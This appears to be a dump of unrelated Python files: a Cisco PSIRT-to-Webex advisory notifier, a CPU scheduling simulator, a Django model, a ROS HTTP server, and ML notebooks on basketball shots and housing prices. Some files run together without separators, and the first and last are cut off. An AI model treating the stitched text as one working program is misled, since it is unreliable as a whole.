        if self.device:
            cmd = [ "/usr/sbin/smartctl", "-t", "short", self.device ]
            out = Helper.sub_process(cmd)
            print("[SmartControl]", out)
            self.selftests = []

    def getDeviceInformation(self):
        """Return cached (key, value) information pairs, parsing lazily."""
        if not self.information:
            self.__parseInformationSection()
        return self.information

    def getCapabilities(self):
        """Return cached capabilities dict, parsing lazily."""
        if not self.capabilities:
            self.__parseCapabilities()
        return self.capabilities

    # returns list of ascii tuples (id, name, failed, value, worst, thresh, raw)
    def getAttributes(self):
        if not self.attributes:
            self.__parseAttributesBlock()
        return self.attributes

    # returns list of ascii tuples (type, status)
    def getSelftestsLog(self):
        if not self.selftests:
            self.__parseSelftestsLog()
        return self.selftests

    # returns list of ascii tuples (type, status)
    def getErrorLog(self):
        if not self.errors:
            self.__parseErrorLog()
        return self.errors
if __name__ == "__main__":
    # Manual smoke test: dump the SMART attributes of /dev/sda.
    import Helper
    d = SmartInfo("sda")
    # print(d.getDeviceInformation())
    print(d.getAttributes())
|
from openVulnQuery import query_client
import csv
import sys,os
import datetime
import json
from webexteamssdk import WebexTeamsAPI
import schedule
import time
api_id = None
api_secret = None
webex_token = None
webex_room_id = None
webex_api = None
class Advisory():
    """Flattened view of an openVulnQuery advisory plus per-product filters."""

    def __init__(self, advisory):
        self.advisory_title = advisory.advisory_title
        self.severity = advisory.sir
        self.summary = advisory.summary
        self.cvss_base_score = advisory.cvss_base_score
        self.all_product_names = advisory.product_names
        self.cvrfUrl = advisory.cvrfUrl
        self.first_published = advisory.first_published
        self.last_updated = advisory.last_updated
        # BUG FIX: the original assigned self.bug_ids twice -- the second
        # assignment clobbered the advisory's bug ids with None.
        self.bug_ids = advisory.bug_ids
        self.workaround = None
        self.fix = None
        # Filled by the *_only() filters below.
        self.concerned_products = []

    def firewall_only(self):
        """Keep only Cisco firewall products (Firepower/ASA/FX-OS)."""
        keywords = ("Firepower", "Adaptive Security Appliance", "ASA", "FX-OS", "fx-os")
        for p in self.all_product_names:
            if any(k in p for k in keywords):
                self.concerned_products.append(p)

    def fxos_only(self):
        """Keep only FX-OS products."""
        for p in self.all_product_names:
            if "FX-OS" in p or "FXOS" in p:
                self.concerned_products.append(p)

    def ise_only(self):
        """Keep only Cisco Identity Services Engine products."""
        for p in self.all_product_names:
            if "Identity Services Engine" in p:
                self.concerned_products.append(p)
def get_report(advisories, product):
    """Write <product><today>.csv with the advisories first published today.

    Returns 1 when at least one advisory was published today, else 0.
    """
    today = str(datetime.date.today())
    file_name = product + today + ".csv"
    advisory_flag = 0
    # newline='' is required by the csv module so it controls line endings
    # itself (avoids blank rows on Windows).
    with open(file_name, 'w', newline='') as f:
        fieldnames = ['First_Published','Advisory','Severity','Summary','Product Names','cvss_base_score']
        writer = csv.DictWriter(f, fieldnames=fieldnames)
        writer.writeheader()
        for a in advisories:
            if a.first_published.find(today) != -1:
                advisory_flag = 1
                # renamed from `dict`, which shadowed the builtin
                row = {'First_Published': a.first_published,
                       'Advisory': a.advisory_title,
                       'Severity': a.severity,
                       'Summary': a.summary,
                       'Product Names': a.concerned_products,
                       'cvss_base_score': a.cvss_base_score}
                writer.writerow(row)
    return advisory_flag
def _report_and_notify(query_product, filter_method, report_key, alert_text, none_text):
    """Query PSIRT advisories for one product family, write today's CSV report
    and post the outcome to the Webex room.

    Shared implementation for the three wrappers below (the original
    duplicated this body; a leftover debug print was dropped).
    """
    today = str(datetime.date.today())
    q_client = query_client.OpenVulnQueryClient(client_id=api_id, client_secret=api_secret)
    advisories = []
    for a in q_client.get_by_product('default', query_product):
        adv_obj = Advisory(a)
        # apply the family-specific product filter (e.g. 'firewall_only')
        getattr(adv_obj, filter_method)()
        advisories.append(adv_obj)
    if get_report(advisories, report_key) == 1:
        webex_api.messages.create(roomId=webex_room_id,
                                  markdown=alert_text + today)
        webex_api.messages.create(roomId=webex_room_id,
                                  files=[report_key + today + ".csv"])
    else:
        webex_api.messages.create(roomId=webex_room_id,
                                  markdown=none_text)


def get_firewall_advisories():
    """Daily firewall (ASA/Firepower/FX-OS) PSIRT check."""
    _report_and_notify('asa', 'firewall_only', 'firewall',
                       "Firewall PSIRT alert for ",
                       "No Firewall PSIRT announced today ")


def get_ise_advisories():
    """Daily Cisco ISE PSIRT check."""
    _report_and_notify('Identity Services Engine', 'ise_only', 'ise',
                       "ISE PSIRT alert for ",
                       "No ISE PSIRT announced today ")


def get_fxos_advisories():
    """Daily FX-OS PSIRT check."""
    _report_and_notify('fxos', 'fxos_only', 'fxos',
                       "FXOS PSIRT alert for ",
                       "No FXOS PSIRT announced today")
def daily_check():
    """Run every product-family PSIRT check once."""
    print("Checking for any new PSIRT")
    for check in (get_firewall_advisories, get_ise_advisories, get_fxos_advisories):
        check()
if __name__=='__main__':
    today = str(datetime.date.today())
    # These rebind the module-level globals used by the check functions.
    api_id = input("Please enter your api client_id \n")
    api_secret = input("Please enter your api client secret \n")
    webex_token = input("Please enter your webex access_token \n")
    webex_room_id = input("Please enter your webex room_id \n")
    # Daemonize: parent exits, child keeps running. NOTE: os.fork() is
    # POSIX-only; this script cannot run on Windows.
    pid = os.fork()
    if pid != 0:
        sys.exit()
    print(" running script in the background")
    webex_api = WebexTeamsAPI(access_token=webex_token)
    # Run one check immediately, then every day at 23:55.
    daily_check()
    # NOTE(review): "HH:MM:SS" at() strings require a recent `schedule`
    # release -- confirm the pinned version supports seconds.
    schedule.every().day.at("23:55:00").do(daily_check)
    while 1:
        schedule.run_pending()
        time.sleep(100)
|
from framework.data.constants import BASE_URL, HEADERS, REDIRECT, STATUS
from framework.utils.service_utils import send_request
def request_headers(headers=None):
    """GET the headers endpoint, forwarding the optional request headers."""
    endpoint = ''.join((BASE_URL, HEADERS))
    return send_request(endpoint, headers=headers)
def request_redirect(count):
    """GET the redirect endpoint for `count` hops, keeping response history."""
    endpoint = '{0}{1}{2}'.format(BASE_URL, REDIRECT, count)
    return send_request(endpoint, return_history=True)
def request_status(status):
    """GET the status endpoint for the given HTTP status code."""
    endpoint = '{0}{1}{2}'.format(BASE_URL, STATUS, status)
    return send_request(endpoint)
|
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load in
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import GridSearchCV
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score
from sklearn.metrics import log_loss
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import PolynomialFeatures
from xgboost.sklearn import XGBModel
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory
import os
print(os.listdir("../input"))
## Reading data into environment
## Reading data into environment
data = pd.read_csv("../input/data.csv")
data.isnull().sum()
# Shot IDs of the submission rows (shot_made_flag is NaN for those)
shot_ids = (data[data.shot_made_flag.isnull() == True]).shot_id
## Adding a year column
# BUG FIX: `data.game_date[:4]` selected the first 4 ROWS of the Series (the
# rest of the column became NaN after index alignment). The .str accessor
# slices the first 4 characters of each date string instead.
data['yr'] = data.game_date.str[:4]
## Adding column representing if Lakers are visiting another Team
data['is_away'] = data.matchup.str.contains('@').astype(int)
## Adding a column for total time remaining (epsilon keeps log() finite below)
data['total_time'] = data.seconds_remaining + (60*data.minutes_remaining)+0.00001
## Log of total time remaining
data['Super-Feature1'] = np.log(data.total_time)
# Dropping identifiers and redundant columns
data = data.drop(['season', 'combined_shot_type','game_id','lat','lon',
                  'team_id','team_name','game_date','matchup','shot_id','shot_zone_area','shot_zone_basic','shot_zone_range'], axis = 1)
# One-hot encoding of the categorical features
data = pd.get_dummies(data, columns = ['yr','action_type','shot_distance','minutes_remaining','period','playoffs','shot_type','opponent'])
# Separating submission data (unknown shot_made_flag) from training data
submission_data = data[data.shot_made_flag.isnull() == True]
data = data[data.shot_made_flag.isnull() == False]
submission_data_X = submission_data.drop(['shot_made_flag'], axis =1)
submission_data_y = submission_data.shot_made_flag
data_X = data.drop(['shot_made_flag'], axis =1 )
data_y = data.shot_made_flag
# Train-test split
X_train, X_test, y_train, y_test = train_test_split(data_X,data_y, random_state = 11230, test_size = 0.3)
# Modelling with Logit (hyper-parameters found through the grid search below)
model = LogisticRegression(penalty = 'l2',C=0.5)
model.fit(X = X_train,y = y_train)
confusion_matrix(y_true = y_test, y_pred = model.predict(X_test))
roc_auc_score(y_true = y_test, y_score = model.predict_proba(X_test)[:,1])
log_loss(y_true = y_test, y_pred = model.predict_proba(X_test)[:,1])
# Modelling with XGBoost
model_XGB = XGBModel()
model_XGB.fit(X_train, y_train)
log_loss(y_true = y_test, y_pred = model_XGB.predict(X_test))
roc_auc_score(y_true = y_test, y_score = model_XGB.predict(X_test))
## Grid Search used to pick the logit hyper-parameters
#param_grid = {'penalty':['l1','l2'],'C': np.arange(0.1, 2.0, 0.025)}
#GS = GridSearchCV(model, param_grid, cv = 5, scoring = 'roc_auc')
#GS.fit(X_train, y_train)
# Submission
submission= pd.DataFrame({'shot_id':shot_ids, 'shot_made_flag': model.predict(submission_data_X)})
submission.to_csv(index = False, path_or_buf ='submission.csv')
from InstIO import *
from DeviceManager import *
class CPU:
    """Executes PCB instruction streams under FCFS or Round-Robin scheduling,
    dispatching I/O instructions to the DeviceManager."""

    def __init__(self,deviceManager,queueReady,resultQueue,waitingProcess):
        self.deviceManager = deviceManager
        self.queueReady = queueReady          # ready queue of PCBs
        self.resultQueue = resultQueue        # executed instructions go here
        self.waitingProcess = waitingProcess  # child PCB id -> waiting parent PCB
        self.isActive = True
    def setActive(self, newState):
        self.isActive = newState
    def getActive(self):
        return self.isActive
    def switchToDeviceManager(self,pcb):
        """Send the pcb to the DeviceManager."""
        self.deviceManager.switchToDevice(pcb)
    def terminoProceso(self,pcb):
        """Tell whether a PCB has finished executing (PC past the last instruction)."""
        return len(pcb.getProgram().getInstructions())<=pcb.getPC()
    def execute(self,pcb,quantum):
        """Start executing the given PCB; quantum == -1 selects FCFS."""
        if not pcb.isWaiting() and not self.terminoProceso(pcb): #check states
            if(quantum == -1): #FCFS execution marker
                salioDeCPU = False
                while (not self.terminoProceso(pcb) and not salioDeCPU): #while the process has not finished and has not left the CPU
                    salioDeCPU = self.processInstruction(pcb) #processes the instruction, reporting whether it executed or left the CPU
            else:
                self.executeWithQuantum(pcb,quantum)
            isTerminated = self.terminoProceso(pcb)
            if(isTerminated and(not pcb.isTerminated())): #check PCB state
                pcb.setTerminated() #update its state
                if(self.hasParentWaiting(pcb)): #wake up the parent PCB if one is waiting
                    self.wakeUpParent(pcb)
                else: print("@CPU: El PCB del programa", pcb.getProgram().getName()," ha terminadó su ejecución")
    def processInstruction(self,pcb):
        """Process the PCB's current instruction; return True when it left the CPU."""
        currentInstruction=pcb.getProgram().getInstructions()[pcb.getPC()]
        if isinstance(currentInstruction,InstIO): #check the instruction type
            self.switchToDeviceManager(pcb)
            return True #left the CPU for I/O
        else:
            currentInstruction.execute(self,pcb) #execute the instruction
            pcb.setPC(pcb.getPC()+1) #advance the PC
            if(pcb.isWaiting()): #check state
                return True
            else:
                self.resultQueue.put(currentInstruction)
                return False
    def executeWithQuantum(self,pcb,quantum):
        """Execute the PCB under the Round-Robin scheduling policy.

        NOTE(review): `quantum` itself is never decremented, so the
        `quantum>0` loop condition is constant; only `quantumSaved` shrinks.
        Confirm this matches the intended Round-Robin semantics.
        """
        quantumSaved = quantum
        estaEnReadyOEnIO = False
        while (not self.terminoProceso(pcb) and not estaEnReadyOEnIO and quantum>0): #check states
            if self.surpassQuantum(pcb,quantumSaved): #not enough quantum left: requeue the PCB and reset its quantum
                self.switchToReady(pcb)
                self.resetQuantum(quantum)
                estaEnReadyOEnIO = True
            else: #execute the instruction
                timeInst = pcb.getProgram().getInstructions()[pcb.getPC()].getTime()
                quantumSaved = quantumSaved - timeInst
                estaEnReadyOEnIO = self.processInstruction(pcb)
    def surpassQuantum(self,pcb,quantum):
        """Tell whether the current instruction needs more time than the given quantum."""
        return pcb.getProgram().getInstructions()[pcb.getPC()].getTime() > quantum
    def switchToReady(self,pcb):
        """Enqueue a PCB on the ready queue."""
        self.queueReady.put(pcb)
    def resetQuantum(self,originalQuantum):
        """Restore the quantum from the parameter.

        NOTE(review): self.quantum is not read anywhere in this class --
        confirm whether another component uses it.
        """
        self.quantum=originalQuantum
    def forkChildPCB(self,childPCB,pcbParent):
        """Record the parent as waiting on the child and enqueue the child as ready."""
        self.waitingProcess[childPCB.getId()] = pcbParent
        print("@CPU: Se ha puesto el PCB padre en la cola de espera")
        self.queueReady.put(childPCB)
        print("@CPU: Se ha puesto el PCB hijo en la cola de listos")
    def hasParentWaiting(self,pcb):
        """Tell whether the given PCB has a parent PCB waiting on it."""
        return pcb.getId() in self.waitingProcess.keys()
    def wakeUpParent(self, pcb):
        """Remove the parent from the waiting map, mark it ready and requeue it.

        NOTE(review): uses `pcb.id` directly while the rest of the class uses
        `pcb.getId()` -- confirm both resolve to the same key.
        """
        pcbToWake = self.waitingProcess.pop(pcb.id)
        pcbToWake.setReady()
        self.switchToReady(pcbToWake)
        print("@CPU: El PCB padre del programa", pcb.getProgram().getName()," ha sido encolado a la cola de listos")
    def shutDown(self):
        self.setActive(False)
|
from .ask_auth_correctness import StateAskAuthCorrectness
from .ask_scores import StateAskScores
from .auth import StateAuth
from .calc import StateCalc
from .greeting import StateGreeting
from .menu import StateMenu
from .ratings import StateRatings
from .settings import StateSettings
from .start import StateStart
from components import Utils
from config import STATES_COLLECTION_NAME
class State:
    """
    Class for working with chat states: transitions, dispatch and persistence.
    """
    def __init__(self, sdk):
        self.sdk = sdk
        self.collection = STATES_COLLECTION_NAME
        # Dict of available states (name -> state class); populated elsewhere
        self.states_list = {}
    async def goto(self, payload, state_name=None, data=None):
        """
        Change state and call its before function
        Example:
        > return await self.controller.goto(payload, 'auth', {'login': 'user273'})
        :param dict payload:
        :param string state_name:
        :param dict data:
        :return void:

        NOTE(review): __set() raises for any name missing from states_list,
        including None -- so the `if state_name is not None` guard below looks
        unreachable for None. Confirm the intended None-handling.
        """
        self.sdk.log("GOTO state {}".format(state_name))
        # Update state
        self.__set(payload, state=state_name, data=data)
        if state_name is not None:
            # Call state's before function
            await self.get_state_class(state_name).before(payload, data)
        # Call wait user answer
        await self.sdk.broker.api.wait_user_answer(
            payload['user'],
            payload['chat'],
            bot=payload.get('bot', None)
        )
    async def process(self, payload, data=None):
        """
        Trigger process() command for current state
        :param dict payload:
        :param data: overrides the stored state data when not None
        :return:
        """
        # Get current state from DB
        state = self.__get(payload)
        self.sdk.log("Process state {} for chat {}".format(state['name'] if state else None, payload['chat']))
        # If state name is missing then return null
        if not state or 'name' not in state:
            return
        # Find state class in map
        state_class = self.get_state_class(state['name'])
        # Call process function for target state
        await state_class.process(payload, data if data is not None else state['data'])
    async def reenter(self, payload):
        """
        Reenter to current state
        :param payload:
        :return:
        """
        # Get current state from DB
        current_state = self.__get(payload)
        # Do nothing if current state is none
        if current_state is None:
            return
        # Enter to current state again
        await self.goto(payload, current_state['name'], current_state['data'])
    def is_state_exist(self, name):
        """
        Check for a state existing
        :param string name:
        :return boolean:
        """
        # Check for a state with target name existing in a states_list dict
        return name in self.states_list
    def get_state_class(self, name):
        """
        Get state class helper if it is exists
        :param string name: state name
        :return: a new instance of the state class, constructed with self
        """
        # If state is not exist then throw an exception
        if not self.is_state_exist(name):
            raise Exception('Can not find class for state {}'.format(name))
        # Otherwise return state class
        return self.states_list[name](self)
    def __get(self, payload):
        """
        Get state from DB for target chat
        :param dict payload:
        :return dict: state from db: _id, chat, name, data, class
        """
        # Get current state from db
        current_state = self.sdk.db.find_one(
            Utils.create_collection_name(self.collection, payload),
            {'chat': payload['chat']}
        )
        # Return None if state is missing
        if not current_state:
            return None
        # Fill class param in dictionary
        current_state['class'] = self.get_state_class(current_state['name'])
        # Return current state data
        return current_state
    def __set(self, payload, state=None, data=None):
        """
        Set state for target chat (synchronous; despite the docstring example
        in the original, no await is needed)
        Example:
        > self.__set(payload, state='start', data=None)
        :param dict payload:
        :param string state:
        :param dict data:
        :return:
        """
        self.sdk.log("Set state {} for chat {}".format(state, payload['chat']))
        # If unexisted state was passed then throw an exception
        if not self.is_state_exist(state):
            raise Exception("State with name {} is not exist".format(state))
        # Prepare state data to be saved
        chat_state = {
            # Target chat
            'chat': payload['chat'],
            # State name
            'name': state,
            # Additional data for state
            'data': data
        }
        # Update state for target chat in db
        self.sdk.db.update(
            # Collection name
            Utils.create_collection_name(self.collection, payload),
            # Find params
            {'chat': chat_state['chat']},
            # Data to be saved
            chat_state,
            # Upsert = true
            True
        )
|
from django.db import models
class Rabbit(models.Model):
    """A rabbit with a unique name and a non-negative carrot count."""
    # name doubles as the display string (see __str__)
    name = models.CharField(max_length=30, null=False, blank=False, unique=True)
    carrots = models.PositiveIntegerField(null=False)
    def __str__(self):
        return self.name
|
from typing import Union
# System level concepts
# ---------------------
# NOTE: all aliases below are plain `str` aliases -- they document intent for
# readers and type-checkers but are interchangeable at runtime.
# An absolute path to a file on the local filesystem
FilePath = str
# An absolute path to an executable file on the local filesystem
ExecutablePath = str
# An absolute path to a directory on the local filesystem (with no trailing slash)
DirectoryPath = str
# Notes directory level concepts
# ------------------------------
# An absolute path to a note from the root of the notes directory
NotePath = str
# An absolute path to a non-note file from the root of the notes directory
ResourcePath = str
# An absolute path to any file from the root of the notes directory
InternalAbsoluteFilePath = Union[NotePath, ResourcePath]
# A subdirectory within the notes directory
Subdir = str
# An absolute path to any file or directory from the root of the notes directory
InternalAbsolutePath = Union[InternalAbsoluteFilePath, Subdir]
# A nicely formatted version of a note path
DisplayPath = str
# A relative path to a note from another note.
# Typically must be transformed into a NotePath before it can be used
RelativeNotePath = str
# A relative path to a resource from a note.
# Typically must be transformed into a ResourcePath before it can be used
RelativeResourcePath = str
# A relative path from a note to another file
InternalRelativeFilePath = Union[RelativeNotePath, RelativeResourcePath]
# A relative path within the notes directory to a subdir
RelativeDirectoryPath = str
# A relative path from a note to either a file or directory
InternalRelativePath = Union[InternalRelativeFilePath, RelativeDirectoryPath]
# Note level concepts
# -------------------
# The full raw string content of a note
RawNoteContent = str
# The full raw content of a single line in a note
RawNoteLine = str
# A URL which points to an external resource
ExternalURL = str
# API level concepts
# ------------------
# String payloads returned by the API layer (already serialized)
ACKResponse = str
CSVData = str
JSONShorthandConfig = str
JSONShorthandConfigUpdates = str
JSONSearchResults = str
JSONTOC = str
JSONSubdirs = str
JSONLinks = str
|
import os
import tarfile
from six.moves import urllib
import pandas as pd
import pprint
import matplotlib.pyplot as plt
import subprocess
import numpy as np
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
DOWNLOAD_ROOT = 'https://raw.githubusercontent.com/ageron/handson-ml/master/'
HOUSING_PATH = "datasets/housing"
HOUSING_URL = DOWNLOAD_ROOT + HOUSING_PATH + '/housing.tgz'
datasets_path = BASE_DIR + '/' + HOUSING_PATH
def fetch_housing_data(housing_url=HOUSING_URL, housing_path=datasets_path):
    """Download the housing tarball from `housing_url` into `housing_path`
    and extract it there.

    BUG FIX: the original ignored its housing_path parameter and always used
    the module-level `datasets_path`; the new default keeps the old behaviour
    for default calls while honouring explicit arguments.
    """
    if not os.path.isdir(housing_path):
        os.makedirs(housing_path)
    tgz_path = os.path.join(housing_path, "housing.tgz")
    urllib.request.urlretrieve(housing_url, tgz_path)
    # Context manager ensures the archive is closed even if extraction fails.
    with tarfile.open(tgz_path) as housing_tgz:
        housing_tgz.extractall(path=housing_path)
def load_housing_data(housing_path=datasets_path):
    """Load ``housing.csv`` from *housing_path* into a DataFrame."""
    return pd.read_csv(os.path.join(housing_path, 'housing.csv'))
# download data (disabled by default; uncomment to fetch the dataset)
#fetch_housing_data()
print('# download data success!')
# head()
print('\n# head()\n')
housing = load_housing_data()
pprint.pprint(housing.head()) # look first 5 rows.
# info()
print('\n# info()\n')
pprint.pprint(housing.info()) # get a quick description of the data.
# value_count()
print('\n# ocean_proximity value_counts()\n')
pprint.pprint(housing['ocean_proximity'].value_counts())
# describe()
print('\n# describe()\n')
pprint.pprint(housing.describe())
# hist()
print('\n# hist()\n')
housing.hist(bins=50, figsize=(20, 15))
plt.savefig('p1')
# catimg renders the saved PNG in the terminal (best-effort).
subprocess.call(['catimg', '-f', 'p1.png'])
#split data
# from testset import split_train_test_by_id
# print("\nSplit data.\n")
# housing_with_id = housing.reset_index() # adds an 'index' colume
# train_set, test_set = split_train_test_by_id(housing_with_id, 0.2, "index")
# print(len(train_set), "train + ", len(test_set), "test")
# split data use sklearn learn
# from sklearn.model_selection import train_test_split
# train_set, test_set = train_test_split(housing, test_size=0.2, random_state=42)
# print(len(train_set), "train + ", len(test_set), "test")
# Bucket median income into categories 1..5 (capped at 5) so the train/test
# split can be stratified on income.
housing['income_cat'] = np.ceil(housing['median_income'] / 1.5)
housing['income_cat'].where(housing['income_cat'] < 5, 5.0, inplace=True)
from sklearn.model_selection import StratifiedShuffleSplit
split = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)
# n_splits=1, so this loop binds strat_train_set/strat_test_set exactly once.
for train_index, test_index in split.split(housing, housing['income_cat']):
    strat_train_set = housing.loc[train_index]
    strat_test_set = housing.loc[test_index]
pprint.pprint(housing['income_cat'].value_counts() / len(housing))
# remove income_cat (only needed for stratification, not for training)
for set_ in (strat_train_set, strat_test_set):
    set_.drop(['income_cat'], axis=1, inplace=True)
# Discover and Visualize the Data to gain insights
housing = strat_train_set.copy()
# Geographic scatter; low alpha reveals where points are dense.
housing.plot(kind="scatter", x="longitude", y="latitude", alpha=0.1)
plt.savefig('p2')
subprocess.call(['catimg', '-f', 'p2.png'])
# Same scatter with marker size ~ population and color ~ median house value.
housing.plot(
    kind="scatter",
    x="longitude",
    y="latitude",
    alpha=0.4,
    s=housing['population'] / 100,
    label="population",
    c="median_house_value",
    cmap=plt.get_cmap("jet"),
    colorbar=True,
)
plt.savefig('p3')
subprocess.call(['catimg', '-f', 'p3.png'])
# Look for Correlations
# way 1
# corr_matrix = housing.corr()
# pprint.pprint(corr_matrix['median_house_value'].sort_values(ascending=False))
# end way 1
# way 2
# Fix: pandas.tools.plotting was removed in pandas 0.25; the canonical
# location since pandas 0.20 is pandas.plotting. Fall back for very old
# pandas so old environments keep working.
try:
    from pandas.plotting import scatter_matrix
except ImportError:  # pandas < 0.20
    from pandas.tools.plotting import scatter_matrix
attribute = ['median_house_value', 'median_income', 'total_rooms', 'housing_median_age']
scatter_matrix(housing[attribute], figsize=(12, 8))
plt.savefig('p4')
subprocess.call(['catimg', '-f', 'p4.png'])
housing.plot(kind='scatter', x='median_income', y="median_house_value", alpha=0.1)
plt.savefig('p5.png')
subprocess.call(['catimg', '-f', 'p5.png'])
# Experimenting with Attribute Combinations: ratio features are often more
# informative than the raw counts.
housing["rooms_per_household"] = housing["total_rooms"] / housing['households']
housing['bedrooms_per_room'] = housing["total_bedrooms"] / housing['total_rooms']
housing['population_per_household'] = housing['population'] / housing['households']
corr_matrix = housing.corr()
pprint.pprint(corr_matrix['median_house_value'].sort_values(ascending=False))
# Separate the predictors from the target label.
housing = strat_train_set.drop('median_house_value', axis=1)
housing_labels = strat_train_set['median_house_value'].copy()
# Data cleaning
from sklearn.preprocessing import Imputer
# NOTE(review): sklearn.preprocessing.Imputer was removed in scikit-learn
# 0.22 (replaced by sklearn.impute.SimpleImputer); this script targets an
# older scikit-learn.
imputer = Imputer(strategy="median")
# The median only exists for numeric columns, so drop the text attribute.
housing_num = housing.drop('ocean_proximity', axis=1)
imputer.fit(housing_num)
pprint.pprint(imputer.statistics_)
pprint.pprint(housing_num.median().values)
X = imputer.transform(housing_num)
housing_tr = pd.DataFrame(X, columns=housing_num.columns)
# Handling text and categorical attributes
# way 1: integer-encode, then one-hot encode
from sklearn.preprocessing import LabelEncoder
encoder = LabelEncoder()
housing_cat = housing['ocean_proximity']
housing_cat_encoded = encoder.fit_transform(housing_cat)
pprint.pprint(housing_cat_encoded)
pprint.pprint(encoder.classes_)
from sklearn.preprocessing import OneHotEncoder
encoder = OneHotEncoder()
housing_cat_1hot = encoder.fit_transform(housing_cat_encoded.reshape(-1, 1))
pprint.pprint(housing_cat_1hot.toarray())
# way 2: LabelBinarizer performs both steps in one shot
from sklearn.preprocessing import LabelBinarizer
encoder = LabelBinarizer()
housing_cat_1hot = encoder.fit_transform(housing_cat)
pprint.pprint(housing_cat_1hot)
# Custom transformers
from sklearn.base import BaseEstimator, TransformerMixin
# Column positions used by CombinedAttributesAdder; presumably
# total_rooms, total_bedrooms, population and households in the numeric
# feature matrix — confirm against the housing.csv column order.
room_ix, bedrooms_ix, population_ix, household_ix = 3, 4, 5, 6
class CombinedAttributesAdder(BaseEstimator, TransformerMixin):
    """Append engineered ratio columns to the housing feature matrix.

    Always adds rooms_per_household and population_per_household; also adds
    bedrooms_per_room when *add_bedrooms_per_room* is True.
    """
    def __init__(self, add_bedrooms_per_room=True):
        # Stored under the same name so sklearn get_params()/set_params() work.
        self.add_bedrooms_per_room = add_bedrooms_per_room
    def fit(self, X, y=None):
        # Stateless transformer: nothing to learn.
        return self
    def transform(self, X, y=None):
        households = X[:, household_ix]
        rooms_per_hh = X[:, room_ix] / households
        pop_per_hh = X[:, population_ix] / households
        if not self.add_bedrooms_per_room:
            return np.c_[X, rooms_per_hh, pop_per_hh]
        beds_per_room = X[:, bedrooms_ix] / X[:, room_ix]
        return np.c_[X, rooms_per_hh, pop_per_hh, beds_per_room]
# Demonstrate the transformer, skipping the optional bedrooms_per_room column.
attr_adder = CombinedAttributesAdder(add_bedrooms_per_room=False)
housing_extra_attribs = attr_adder.transform(housing.values)
# Transformation Pipelines
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler # ScandardScaler data
from sklearn.pipeline import FeatureUnion
class DataFrameSelector(BaseEstimator, TransformerMixin):
    """Custom Transformer for sklearn to handle pandas Dataframes."""
    def __init__(self, attribute_names):
        # Names of the DataFrame columns to extract, in order.
        self.attribute_names = attribute_names
    def fit(self, X, y=None):
        # Stateless: nothing to fit.
        return self
    def transform(self, X):
        # Return the selected columns as a plain NumPy array.
        return X[self.attribute_names].values
num_attribs = list(housing_num)
cat_attribs = ['ocean_proximity']
# Numeric branch: select columns -> impute medians -> add ratio features ->
# standardize.
num_pipeline = Pipeline([
    ('selector', DataFrameSelector(num_attribs)),
    ('imputer', Imputer(strategy="median")),
    ('attribs_adder', CombinedAttributesAdder()),
    ('std_scaler', StandardScaler()),
])
# Categorical branch: select column -> one-hot encode.
# NOTE(review): LabelBinarizer inside a Pipeline only works on very old
# scikit-learn; newer versions reject the extra fit_transform argument.
cat_pipeline = Pipeline([
    ('selector', DataFrameSelector(cat_attribs)),
    ('label_binarizer', LabelBinarizer()),
])
# Run both branches and concatenate their outputs column-wise.
full_pipeline = FeatureUnion(transformer_list=[
    ('num_pipeline', num_pipeline),
    ('cat_pipeline', cat_pipeline),
])
housing_prepared = full_pipeline.fit_transform(housing)
pprint.pprint(housing)
pprint.pprint(housing_prepared.shape)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2009-2010 W-Mark Kubacki; wmark@hurrikane.de
#
__all__ = []
|
#!/usr/bin/env python
import http.server
import socketserver
import threading
import rospy
import robot_resource.robot_resource as rs
from sensor_msgs.msg import Image
from sensor_msgs.msg import NavSatFix
class RequestHandler(http.server.SimpleHTTPRequestHandler):
    """Routes the robot's HTTP GET endpoints to robot_resource handlers."""

    def do_GET(self):
        # Dispatch table instead of an if/elif chain. Unknown paths fall
        # through without a response, exactly like the original (the default
        # SimpleHTTPRequestHandler.do_GET stays disabled).
        routes = {
            "/robotInfo": rs.GET_robot_info,
            "/robotStatus": rs.GET_robot_status,
            "/leftCameraFrame": rs.GET_left_camera_frame,
        }
        handler = routes.get(self.path)
        if handler is not None:
            handler(self)
def main():
    """Start the robot HTTP resource server on top of a ROS node."""
    # Init ROS.
    rospy.init_node('http_server', anonymous=True)
    # Get params.
    statek_name = rospy.get_param("~statek_name", "statek")
    left_camera_topic = rospy.get_param("~left_camera_topic", "/" + statek_name + "/stereo/left/image_rect_color")
    gps_topic = rospy.get_param("~gps_topic", "/" + statek_name + "/gps/fix")
    # Set params to robot resource.
    rs.ROS_set_robot_info(statek_name)
    # Init subscribers; queue_size=1 because only the freshest message matters.
    rospy.Subscriber(left_camera_topic, Image, rs.ROS_camera_frame_callback, queue_size=1)
    rospy.Subscriber(gps_topic, NavSatFix, rs.ROS_gps_fix_callback, queue_size=1)
    PORT = 1337
    handler = RequestHandler
    httpd = socketserver.TCPServer(("", PORT), handler)
    http_thread = threading.Thread(name='http_thread', target=httpd.serve_forever)
    http_thread.start()
    try:
        # Fix: the original busy-waited with `while not rospy.is_shutdown():
        # pass`, pinning a CPU core. rospy.spin() blocks idly until shutdown.
        rospy.spin()
    finally:
        # Always stop the HTTP server, even if spin() raises.
        httpd.shutdown()
        http_thread.join()
if __name__ == '__main__':
    main()
import itertools as itr
import causaldag as cd
from collections import defaultdict
from copy import deepcopy
class IntransitiveParentError(Exception):
    """Raised when i<j cannot be added: some k<i exists that is not below j."""
    def __init__(self, i, j):
        super().__init__(
            f"The relation {i}<{j} cannot be added since there is a k s.t. k<{i} but k is not <{j}")
class IntransitiveChildrenError(Exception):
    """Raised when i<j cannot be added: some k above j exists not above i."""
